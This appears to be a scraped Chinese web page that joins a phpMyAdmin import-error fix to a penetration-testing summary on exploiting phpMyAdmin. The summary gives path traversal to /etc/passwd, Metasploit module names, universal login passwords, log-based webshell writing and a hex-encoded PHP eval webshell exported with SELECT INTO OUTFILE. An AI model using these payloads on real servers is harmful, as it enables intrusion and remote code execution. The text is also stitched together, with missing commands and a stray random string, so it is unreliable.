本文目录一览:
“phpmyadmin”导入数据库错误怎么解决?
1、打开需要导入数据库的界面;
2、点击导入,打开导入页面。
3、点击选择文件,找到选择文件页面。
4、选择需要导入的文件
5、点击执行。
6、直接导入会报错,错误如下。
7、遇到这种情况需要用记事本打开数据库,去除头部部分并保存。
8、然后继续选择文件导入。
9、点击执行,导入成功。
phpMyAdmin利用小结
在phpmyadmin根目录下后面添加:
在fofa上搜索相应站点进行测试:
Trick:如何判断目录是否存在,往往确定了/var/www/html目录,但是还有一层目录不能 确定,可以采用目标域名+常用的网站根目录的方式进行爆破,当使用
不存在将会报错Can't create/write to file '/var/www/html/666.txt' (Errcode: 2);
如果存在但是目录写不进去将返回(Errcode: 13);
利用过程:
1、获取网站绝对路径
2、判断是否有读写权限:
版本5.5.53之前默认为空,之后的版本默认为null
这个值是只读变量,只能通过配置文件修改,且更改后需重启服务才生效
3、写入shell到网站根目录下
原理:MySQL5.0版本以上会创建日志文件,phpmyadmin有一个记录日志的文件,但是一般情况下会关闭。通过修改日志的全局变量,打开日志并指定日志保存路径,设置日志记录名称为.php
查询日志全局变量:
打开日志全局变量:
设置日志保存路径:
进行查询,使查询的语句写入日志文件中:
原理:只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志
启用慢查询日志(默认禁用):
修改slow_query_log_file日志文件的绝对路径以及文件名:
慢查询时间值:
如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中
通常情况下执行sql语句时的执行时间一般不会超过10s,所以说这个日志文件应该是比较小的,而且默认也是禁用状态,不会引起管理员的察觉。
向日志文件写入shell:
phpmyadmin反序列化漏洞任意文件读取(WooYun-2016-199433)
影响phpMyAdmin 2.x版本,poc如下:
CVE-2016-5734 RCE:
利用条件:
主要原因由于将用户输入的信息拼接进preg_replace函数第一个参数中,而在PHP5.4.7以前,preg_replace存在漏洞,可以0进行截断,并将正则模式修改为e,进而执行命令。
在Kali中有自带的EXP
具体请参考:
CVE-2018-12613文件包含:
利用条件:
满足以下5个条件:
判断是否存在漏洞经过二次编码绕过
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
然后在sql语句中执行一些语句记录到日志,然后在包含即可
SELECT '?php phpinfo()?';
查询phpmyadmin cookie值(开发者工具查看)
CVE-2014 -8959:本地文件包含
利用条件:
POC:
在实际利用中可以利用写入文件到/tmp目录下结合此漏洞完成RCE,php版本可以通过http header、导出表内容到文件的附加内容看到。
CVE-2013-3238:
利用条件:
msf有相应的利用模块:
exploit/multi/http/phpmyadmin_preg_replace
CVE-2012-5159:
利用条件:
msf有相应的利用模块:
exploit/multi/http/phpmyadmin_3522_backdoor
CVE-2009-1151:
PhpMyAdmin配置文件/config/config.inc.php存在命令执行
利用条件:
msf有相应的利用模块:
exploit/unix/webapp/phpmyadmin_config
弱口令万能密码:
弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@”则登录成功
phpMyAdmin渗透利用总结
phpMyAdmin 渗透利用总结
phpmyadmin怎么执行sql
select XXX into outfile "test.txt" from myTable;
==补充==
select into outfile导出webshell技巧
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的。54905bd4f9rlxbjl
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话?php eval($_REQUEST[cmd]);?导出得到webshell.-phpmyadmin执行
遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc...-phpmyadmin执行